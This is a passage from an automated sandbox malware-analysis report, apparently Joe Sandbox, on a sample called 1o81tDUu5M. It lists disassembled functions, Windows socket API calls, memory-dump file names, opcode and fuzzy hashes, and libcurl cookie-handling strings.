                                                              Function 009FA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 009FA97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: c382f9184dd6c21743723c5240e6a066395c14ea8ea466a422fc508636d0771f
                                                              • Instruction ID: a434f2641f486676f0cec758759d26686d1121e4669c1d09ef902e9d3865c8a2
                                                              • Opcode Fuzzy Hash: c382f9184dd6c21743723c5240e6a066395c14ea8ea466a422fc508636d0771f
                                                              • Instruction Fuzzy Hash: AE01DBB5B007149FD714CF14DC45B66B7A5EF84720F06855DFA982B361C331AC508BE1
                                                              Function 009FA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,009E712E,?,?,?,00001001,00000000), ref: 009FA90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: f5314a2a1917e928bb1aaafcc98f00ce39334f518b4ffb06caf9fa385812c71a
                                                              • Instruction ID: 07bf21370bd656fd7f25cc5cda3c9f7bc27365cf7d07c2561f0303aeb8dc5c23
                                                              • Opcode Fuzzy Hash: f5314a2a1917e928bb1aaafcc98f00ce39334f518b4ffb06caf9fa385812c71a
                                                              • Instruction Fuzzy Hash: D3F049B5108308AFD2109A01DC44D7BBBADEBC9754F05896DF94C232118270AE108AB2
                                                              Function 009FAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,009FB280,00000000,-00000001,00000000,009FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 009FAF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 4887699089bf3a24cd5444ecc2ef47f5ef8db922f66f302cb55ccffb1dbc2562
                                                              • Instruction ID: 069493313267759d193eb9d38638e3c32488362dd2c419960952ffaa8e42b96a
                                                              • Opcode Fuzzy Hash: 4887699089bf3a24cd5444ecc2ef47f5ef8db922f66f302cb55ccffb1dbc2562
                                                              • Instruction Fuzzy Hash: 55E0EDB6A092216FD654DE18E8449ABF36DEFC4B20F054A49B95467304C330AC5087E2
                                                              Function 009FB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • closesocket.WS2_32(?,009F9422,?,?,?,?,?,?,?,?,?,?,?,009E3377,00D77680,00000000), ref: 009FB04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 87ea3473b619b9a2399de5c89d5095de4fa07bbee8d191429200a33c1f2b5222
                                                              • Instruction ID: 6a08bba93ce039985144f6df7154b6103af431db4bb1543766676d92e1c34958
                                                              • Opcode Fuzzy Hash: 87ea3473b619b9a2399de5c89d5095de4fa07bbee8d191429200a33c1f2b5222
                                                              • Instruction Fuzzy Hash: 1CD08C3830020197CA209E14C884A67722B7FC0310FACCA68A12C4A158DB3BCC428701
                                                              Function 009967E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,0096AF56,?,00000001), ref: 009967FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 90d838889068e61e899048704fce648e72b8297ab78ccf7c617e310d24fa89cb
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: 90d838889068e61e899048704fce648e72b8297ab78ccf7c617e310d24fa89cb
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              Function 00CBB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 8e76b9f0b2822722bd4001f96bc5107541a80e07a8ee4b4e1a3c681e59935c89
                                                              • Instruction ID: 15f8d6df74b6ee43c853910fdeadc7d4859a65e83bef330c04d8a9f7ba20411b
                                                              • Opcode Fuzzy Hash: 8e76b9f0b2822722bd4001f96bc5107541a80e07a8ee4b4e1a3c681e59935c89
                                                              • Instruction Fuzzy Hash: FCC04CA4D1464446D744BB38854611D79E47741104FC11A68998896196F66893188667
                                                              Function 06D70A2F Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef72a60134d3f40339f0f85343632ef7e7e870d82fc87dbc64e79ff9f94772af
                                                              • Instruction ID: 062756bc2693b8493f4ef906ce5494ab319c3897c906a7980564c9fa6c0c5a41
                                                              • Opcode Fuzzy Hash: ef72a60134d3f40339f0f85343632ef7e7e870d82fc87dbc64e79ff9f94772af
                                                              • Instruction Fuzzy Hash: AB3107EB14C124BDB3C285D05B14AFAA6BEEAD73717304036F483D5682F2948B4952B3
                                                              Function 06D70A61 Relevance: .1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 464b5dd9c5355badb9446ff2073d3eb2b81c8bce867e3452dcc7b3d4a29df30f
                                                              • Instruction ID: d6979c0728ae9ad84b34db196f8d599d6d4d6172388bc44787ea96e7da62bed2
                                                              • Opcode Fuzzy Hash: 464b5dd9c5355badb9446ff2073d3eb2b81c8bce867e3452dcc7b3d4a29df30f
                                                              • Instruction Fuzzy Hash: 863139EB14D154BEB38285905F10AFA7BBED6C73753318066F483D2682F2945F0952B3
                                                              Function 06D70B14 Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9431a91f8b45121259f8cd7d5898c02cfa5965a94e6f8ceae1c58c78906e49f
                                                              • Instruction ID: 27b2d84dbf79d984d09006964e732256a4e3f196824520f0cbf6d340a097d7bc
                                                              • Opcode Fuzzy Hash: f9431a91f8b45121259f8cd7d5898c02cfa5965a94e6f8ceae1c58c78906e49f
                                                              • Instruction Fuzzy Hash: F9314BE610C2547EF38286905B54AFA7B7EEAC7331731406AF482C6583F2855F0A82B3
                                                              Function 06D70AD3 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e263e196a848102149ecea2b26c89d9dab720107578104e8da97293b0bb57586
                                                              • Instruction ID: afa3028155e2496656a8cd578623acf0b0b78eeabff4e926d603daad5b48d76d
                                                              • Opcode Fuzzy Hash: e263e196a848102149ecea2b26c89d9dab720107578104e8da97293b0bb57586
                                                              • Instruction Fuzzy Hash: E42107EB14D114BDB38289906B54AFA6BBEE6C73317318426F483D2682F2D49F4951B3
                                                              Function 06D70AC7 Relevance: .1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c661f2d75323a764fff86a1c61a89cad3d32eef8469d52814787b48ce8a45ab4
                                                              • Instruction ID: 66bd0e8b248369a96fe1ade60fc39f1062898f686a264caf46b3a0c8dd89bb4d
                                                              • Opcode Fuzzy Hash: c661f2d75323a764fff86a1c61a89cad3d32eef8469d52814787b48ce8a45ab4
                                                              • Instruction Fuzzy Hash: E621F3EB24C114BEB3C285906B14AFA66BED6C73717318426F483D2682F2D49F0951B2
                                                              Function 06D70AF7 Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e29c00b68e30d611b3290f5afa067deb0c87ec942e8f177bdfd440597b557b5
                                                              • Instruction ID: c755fd452019db958bff003c5887f33b81cef63c48af2f354a4ad159f4144442
                                                              • Opcode Fuzzy Hash: 0e29c00b68e30d611b3290f5afa067deb0c87ec942e8f177bdfd440597b557b5
                                                              • Instruction Fuzzy Hash: 252138EB14C114BDB3C299902B54AFAAB7ED5C73717318426F883D2582F2848F0951B3
                                                              Function 06D70B7A Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9adabb9c6679b26fc6e783a1adc9d78eda447606675a3b80072e002b05479b
                                                              • Instruction ID: 117360d5c0f945eba349d42ebcf5e09bc8713efbf6ac025bfc72142b16fd7f67
                                                              • Opcode Fuzzy Hash: bb9adabb9c6679b26fc6e783a1adc9d78eda447606675a3b80072e002b05479b
                                                              • Instruction Fuzzy Hash: A42134EB24C125BDB78285906B14AFAAB7EE5C33713318426F883D2542F3D49F0A51B3
                                                              Function 06D70BAA Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 630c0f32e092786580b726c10846ffa6faf1dea37d62e2b422b4e29c4b2f4e5a
                                                              • Instruction ID: ea1303a0b23fdd3539a60bf88a986a87173e4efa8122bf06985406cc1556dbaa
                                                              • Opcode Fuzzy Hash: 630c0f32e092786580b726c10846ffa6faf1dea37d62e2b422b4e29c4b2f4e5a
                                                              • Instruction Fuzzy Hash: 010126E704C125BDB3C2C1805B10AFE667EE6C63317318026F483E1142F2988F4940F7
                                                              Function 06D70BBA Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 911778c0d0f0a7f61b347e5362c470aad47e1fa5d424fe44b7768b7920beb8b2
                                                              • Instruction ID: 225604830cd14bd19aafef515e4311e2e2d14800ce27832ad6f1feb2c57c6dc6
                                                              • Opcode Fuzzy Hash: 911778c0d0f0a7f61b347e5362c470aad47e1fa5d424fe44b7768b7920beb8b2
                                                              • Instruction Fuzzy Hash: E90126F614C115BEB391D5915B14AFF62BEE6D3331731802AF483E1542F2999F4940B3
                                                              Function 06D70BE3 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1d8f6ad9c4751a3c23e5c0730e0e3649b937dccd4ddae3303ed8861537330e9
                                                              • Instruction ID: bd6d22095d156a7af53e50c96c3744d5f12542f9e54d74ec2bb1799d47bc24bb
                                                              • Opcode Fuzzy Hash: b1d8f6ad9c4751a3c23e5c0730e0e3649b937dccd4ddae3303ed8861537330e9
                                                              • Instruction Fuzzy Hash: 63F0CDEB18D015BCB39281815B24BFA66BEE6D63327328426F483E1542F2994F9904B6

                                                              Non-executed Functions

                                                              Function 00971BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: aec09a5deebeef829f12b66dfc5b3407752dda40b89c8540288e2c8c1d6a6ab2
                                                              • Instruction ID: 6707c7908a189d3c19ec316bf8ae96e72c6c4a1ea0c27cec1f39b2821b2fd2cb
                                                              • Opcode Fuzzy Hash: aec09a5deebeef829f12b66dfc5b3407752dda40b89c8540288e2c8c1d6a6ab2
                                                              • Instruction Fuzzy Hash: 5FB22672A18701AFD7359B24EC42B66BBD9AF84704F08C828F98D97283E775EC44D752
                                                              Function 00944940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
